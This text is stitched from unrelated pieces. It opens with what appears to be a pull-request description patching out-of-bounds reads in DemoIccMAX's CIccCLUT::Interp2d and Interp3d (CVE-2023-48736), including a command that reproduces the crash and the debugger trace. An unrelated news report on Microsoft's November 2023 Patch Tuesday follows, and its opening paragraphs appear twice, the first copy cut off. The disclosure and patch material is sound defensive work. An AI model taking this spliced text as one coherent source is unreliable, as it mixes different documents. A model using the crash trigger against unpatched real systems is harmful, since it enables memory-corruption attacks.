**Proposed Patch**

1.  Boundary Handling:  
    The patch uses >= to check if ix and iy exceed mx - 1 and my - 1, respectively. This approach is more robust, preventing ix and iy from going out of bounds.
2.  Index Calculation:  
    The patch explicitly calculates indices for each corner of the interpolation square. This clarity helps understand and validate the indexing logic.  
    The addition of boundary checks (if (n000Index > maxValidIndex || ...)) is a significant improvement. It ensures that the function does not attempt to access m\_pData beyond its allocated size.
3.  Error Handling:  
    If an out-of-bounds condition is detected, the function fills destPixel with zeros and returns early. This is a safe fallback and prevents potential undefined behavior.

**Reproduction of Issue**

With Commit f184f38 the Issue may be Reproduced as follows:

    1. Build with Address Sanitizer
    2. Run Tests
    

**PoC**

    CalcTest %  ../iccApplyNamedCmm -debugcalc rgbExercise8bit.txt 0 1 calcExercizeOps.icc 1
    ...
    * thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=2, address=0x603400002420)
        frame #0: 0x000000010126bd97 libIccProfLib2.2.dylib`CIccCLUT::Interp2d(this=0x0000614000000040, destPixel=0x0000611000000a40, srcPixel=0x000060300000484c) const at IccTagLut.cpp:2454:10
       2451	  dF3 =  t*  u;
       2452
       2453	  for (i=0; i<m_nOutput; i++, p++) {
    -> 2454	    pv = p[n000]*dF0 + p[n001]*dF1 + p[n010]*dF2 + p[n011]*dF3;
       2455
       2456	    destPixel[i] = pv;
       2457	  }
    Target 0: (iccApplyNamedCmm) stopped.
    (lldb) fr va
    (CIccCLUT *) this = 0x0000614000000040
    (icFloatNumber *) destPixel = 0x0000611000000a40
    (const icFloatNumber *) srcPixel = 0x000060300000484c
    (icUInt8Number) mx = '\x01'
    (icUInt8Number) my = '\x01'
    (icFloatNumber) x = NaN
    (icFloatNumber) y = -1000.5
    (icUInt32Number) ix = 0
    (icUInt32Number) iy = 4294966296
    (icFloatNumber) u = NaN
    (icFloatNumber) t = -4.2949673E+9
    (icFloatNumber) nt = 4.2949673E+9
    (icFloatNumber) nu = NaN
    (int) i = 0
    (icFloatNumber *) p = 0x0000603400002420
    (icFloatNumber) dF0 = NaN
    (icFloatNumber) dF1 = NaN
    (icFloatNumber) dF2 = NaN
    (icFloatNumber) dF3 = NaN
    (icFloatNumber) pv = 4.59051364E-41
    (lldb) bt
    * thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=2, address=0x603400002420)
      * frame #0: 0x000000010126bd97 libIccProfLib2.2.dylib`CIccCLUT::Interp2d(this=0x0000614000000040, destPixel=0x0000611000000a40, srcPixel=0x000060300000484c) const at IccTagLut.cpp:2454:10
        frame #1: 0x0000000101076099 libIccProfLib2.2.dylib`CIccMpeCLUT::Apply(this=0x0000603000004330, pApply=0x0000603000004720, dstPixel=0x0000611000000a40, srcPixel=0x000060300000484c) const at IccMpeBasic.cpp:5665:12
        frame #2: 0x00000001010c6435 libIccProfLib2.2.dylib`CIccApplyMpe::Apply(this=0x0000603000004720, pDestPixel=0x0000611000000a40, pSrcPixel=0x000060300000484c) at IccTagMPE.h:213:84
        frame #3: 0x00000001010c62e0 libIccProfLib2.2.dylib`CIccSubCalcApply::Apply(this=0x00006020000010b0, pDestPixel=0x0000611000000a40, pSrcPixel=0x000060300000484c) at IccMpeCalc.h:432:99
        frame #4: 0x00000001010c5f69 libIccProfLib2.2.dylib`CIccOpDefSubElement::Exec(this=0x0000602000000690, op=0x00000001000cdc28, os=0x00007ff7bfef7b60) at IccMpeCalc.cpp:374:17
        frame #5: 0x00000001010ac97d libIccProfLib2.2.dylib`CIccCalculatorFunc::ApplySequence(this=0x00006030000043c0, pApply=0x0000608000000a20, nOps=40670, ops=0x00000001000c3800) const at IccMpeCalc.cpp:3663:21
        frame #6: 0x00000001010ad378 libIccProfLib2.2.dylib`CIccCalculatorFunc::Apply(this=0x00006030000043c0, pApply=0x0000608000000a20) const at IccMpeCalc.cpp:3690:8
        frame #7: 0x00000001010b891d libIccProfLib2.2.dylib`CIccMpeCalculator::Apply(this=0x0000606000000e00, pApply=0x0000608000000a20, pDestPixel=0x00007ff7bfefe930, pSrcPixel=0x00007ff7bfefe750) const at IccMpeCalc.cpp:4797:22
        frame #8: 0x00000001010c6435 libIccProfLib2.2.dylib`CIccApplyMpe::Apply(this=0x0000608000000a20, pDestPixel=0x00007ff7bfefe930, pSrcPixel=0x00007ff7bfefe750) at IccTagMPE.h:213:84
        frame #9: 0x00000001012aee00 libIccProfLib2.2.dylib`CIccTagMultiProcessElement::Apply(this=0x00006070000005d0, pApply=0x0000606000000f20, pDestPixel=0x00007ff7bfefe930, pSrcPixel=0x00007ff7bfefe750) const at IccTagMPE.cpp:1467:15
        frame #10: 0x0000000100fa1403 libIccProfLib2.2.dylib`CIccXformMpe::Apply(this=0x000060e000003ca0, pApply=0x0000604000002550, DstPixel=0x00007ff7bfefe930, SrcPixel=0x00007ff7bfefe750) const at IccCmm.cpp:7324:9
        frame #11: 0x0000000100fbd1bc libIccProfLib2.2.dylib`CIccApplyNamedColorCmm::Apply(this=0x0000604000002510, DstPixel=0x00007ff7bfefe930, SrcPixel=0x00007ff7bfefe750) at IccCmm.cpp:9511:18
        frame #12: 0x0000000100fb1e1d libIccProfLib2.2.dylib`CIccCmm::Apply(this=0x00007ff7bfefe2e0, DstPixel=0x00007ff7bfefe930, SrcPixel=0x00007ff7bfefe750) at IccCmm.cpp:8481:20
        frame #13: 0x000000010000bbb7 iccApplyNamedCmm`CIccNamedColorCmm::Apply(this=0x00007ff7bfefe2e0, DstPixel=0x00007ff7bfefe930, SrcPixel=0x00007ff7bfefe750) at IccCmm.h:1769:95
        frame #14: 0x000000010000997a iccApplyNamedCmm`main(argc=6, argv=0x00007ff7bfeff5a8) at iccApplyNamedCmm.cpp:483:30
        frame #15: 0x00007ff806f533a6 dyld`start + 1942
    

**CIccCLUT::Interp2d Expected Output with this Patch**

     CalcTest %  ../iccApplyNamedCmm -debugcalc rgbExercise8bit.txt 0 1 calcExercizeOps.icc 1
    ...
    End Calculator Apply
    
       0.9505    1.0000    1.0891 	;  255.0000  255.0000  255.0000
    

**CIccCLUT::Interp2d Testing**

This Patch for CIccCLUT::Interp2d has completed all applicable Tests contain within the Project. Additionally, the function has been Fuzzed with a wide range of well-known input and has passed a well-defined range of Unit Tests to be a merge candidate.

**CIccCLUT::Interp3d Patch Summary**

*   This PR Patch for CIccCLUT::Interp2d and Interp3d in IccTagLut.cpp #58 also addresses the same Issues described above.

Please consider Merging this PR to address Boundary Handling, Index Calculations and Error Handling in these 2 functions/

CVE-2023-48736: Patch for CIccCLUT::Interp2d and Interp3d in IccTagLut.cpp by xsscx · Pull Request #58 · InternationalColorConsortium/DemoIccMAX

Microsoft has released fixes to address 63 security bugs in its software for the month of November 2023, including three vulnerabilities that have come under active exploitation in the wild.
Of the 63 flaws, three are rated Critical, 56 are rated Important, and four are rated Moderate in severity. Two of them have been listed as publicly known at the time of the release.
The updates are in

Microsoft has released fixes to address 63 security bugs in its software for the month of November 2023, including three vulnerabilities that have come under active exploitation in the wild.

Of the 63 flaws, three are rated Critical, 56 are rated Important, and four are rated Moderate in severity. Two of them have been listed as publicly known at the time of the release.

The updates are in addition to more than 35 security shortcomings addressed in its Chromium-based Edge browser since the release of Patch Tuesday updates for October 2023.

The five zero-days that are of note are as follows -

*   **CVE-2023-36025** (CVSS score: 8.8) - Windows SmartScreen Security Feature Bypass Vulnerability
*   **CVE-2023-36033** (CVSS score: 7.8) - Windows DWM Core Library Elevation of Privilege Vulnerability
*   **CVE-2023-36036** (CVSS score: 7.8) - Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability
*   **CVE-2023-36038** (CVSS score: 8.2) - ASP.NET Core Denial of Service Vulnerability
*   **CVE-2023-36413** (CVSS score: 6.5) - Microsoft Office Security Feature Bypass Vulnerability

Both CVE-2023-36033 and CVE-2023-36036 could be exploited by an attacker to gain SYSTEM privileges, while CVE-2023-36025 could make it possible to bypass Windows Defender SmartScreen checks and their associated prompts.

"The user would have to click on a specially crafted Internet Shortcut (.URL) or a hyperlink pointing to an Internet Shortcut file to be compromised by the attacker," Microsoft said about CVE-2023-36025.

The Windows maker, however, has not provided any further guidance on the attack mechanisms employed and the threat actors that may be weaponizing them. But the active exploitation of the privilege escalation flaws suggests that they are likely used in conjunction with a remote code execution bug.

"There have been 12 elevation of privilege vulnerabilities in the DWM Core Library over the last two years, though this is the first to have been exploited in the wild as a zero-day," Satnam Narang, senior staff research engineer at Tenable, said in a statement shared with The Hacker News.

The development has prompted the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to add the three issues to its Known Exploited Vulnerabilities (KEV) catalog, urging federal agencies to apply the fixes by December 5, 2023.

Also patched by Microsoft are two critical remote code execution flaws in Protected Extensible Authentication Protocol and Pragmatic General Multicast (CVE-2023-36028 and CVE-2023-36397, CVSS scores: 9.8) that a threat actor could leverage to trigger the execution of malicious code.

The November update further includes a patch for CVE-2023-38545 (CVSS score: 9.8), a critical heap-based buffer overflow flaw in the curl library that came to light last month, as well as an information disclosure vulnerability in Azure CLI (CVE-2023-36052, CVSS score: 8.6).

"An attacker that successfully exploited this vulnerability could recover plaintext passwords and usernames from log files created by the affected CLI commands and published by Azure DevOps and/or GitHub Actions," Microsoft said.

Palo Alto Networks researcher Aviad Hahami, who reported the issue, said the vulnerability could enable access to credentials stored in the pipeline's log and permit an adversary to potentially escalate their privileges for follow-on attacks.

In response, Microsoft said it has made changes to several Azure CLI commands to harden Azure CLI (version 2.54) against inadvertent usage that could lead to secrets exposure.

**Software Patches from Other Vendors**

In addition to Microsoft, security updates have also been released by other vendors over the past few weeks to rectify several vulnerabilities, including —

*   Adobe
*   AMD (including CacheWarp)
*   Android
*   Apache Projects
*   Apple
*   Aruba Networks
*   Arm
*   ASUS
*   Atlassian
*   Cisco
*   CODESYS
*   Dell
*   Drupal
*   F5
*   Fortinet
*   GitLab
*   Google Chrome
*   Hitachi Energy
*   HP
*   IBM
*   Intel
*   Jenkins
*   Juniper Networks
*   Lenovo
*   Linux distributions Debian, Oracle Linux, Red Hat, SUSE, and Ubuntu
*   MediaTek
*   Mitsubishi Electric
*   NETGEAR
*   NVIDIA
*   Palo Alto Networks
*   Qualcomm
*   Samsung
*   SAP
*   Schneider Electric
*   Siemens
*   SolarWinds
*   SonicWall
*   SysAid
*   Trend Micro
*   Veeam
*   Veritas
*   VMware
*   WordPress
*   Zimbra
*   Zoom, and
*   Zyxel

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#apple